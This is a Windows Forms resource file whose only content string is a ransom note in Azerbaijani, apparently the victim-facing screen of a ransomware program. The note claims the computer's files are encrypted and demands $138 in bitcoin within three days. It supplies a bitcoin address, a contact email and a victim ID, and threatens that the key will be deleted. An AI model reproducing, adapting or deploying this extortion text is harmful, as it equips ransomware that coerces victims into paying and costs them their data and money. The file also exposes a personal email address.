﻿<?xml version="1.0" encoding="utf-8"?>
<root>
  <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
    <xsd:element name="root" msdata:IsDataSet="true">
      <xsd:complexType>
        <xsd:choice maxOccurs="unbounded">
          <xsd:element name="data">
            <xsd:complexType>
              <xsd:sequence>
                <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
                <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
              </xsd:sequence>
              <xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
              <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
              <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
            </xsd:complexType>
          </xsd:element>
          <xsd:element name="resheader">
            <xsd:complexType>
              <xsd:sequence>
                <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
              </xsd:sequence>
              <xsd:attribute name="name" type="xsd:string" use="required" />
            </xsd:complexType>
          </xsd:element>
        </xsd:choice>
      </xsd:complexType>
    </xsd:element>
  </xsd:schema>
<resheader name="resmimetype"><value>text/microsoft-resx</value></resheader><resheader name="version"><value>1.3</value></resheader><resheader name="reader"><value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value></resheader><resheader name="writer"><value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value></resheader><data name="textBox2.Text"><value>Komputerinizdəki fayllar şifrələndi. Bərpa etmək üçün 138$ dəyərində bitcoini aşağıda göstərilmiş ünvana göndərin. Göndərdikdən sonra email vasitəsi ilə əlaqə saxlayın.
Ödənməmişdən əvvəl yazılan heç bir mail üçün cavab yazılmayacaq. Ödəniş yalnız bitcoin ilə mümükündür.
Unutmayın:
Bizdən başqa heçkim sizin faylları qaytara bilməyəcək.Sizin id üçün təyin olunmuş şifrə 3 gündən sonra bazadan silinəcəkdir.Faylları qaytarmaq üçün 3 gün vaxtınız var

Bitcoin almaq üçün internetdən axtara bilərsiniz yada aşağıdakı adreslərdən ala bilərsiniz.
Coinmama - https://www.coinmama.com 
Bitpanda - https://www.bitpanda.com

Ödəniş qiyməti: 138$
Bitkoin adresi: bc1qnurh904jcnxm0amfg2cy3406k4ed2vd2x67s8p
Email: ramil.namazov.1992@outlook.com
Your ID: 740682679</value></data>
  </root>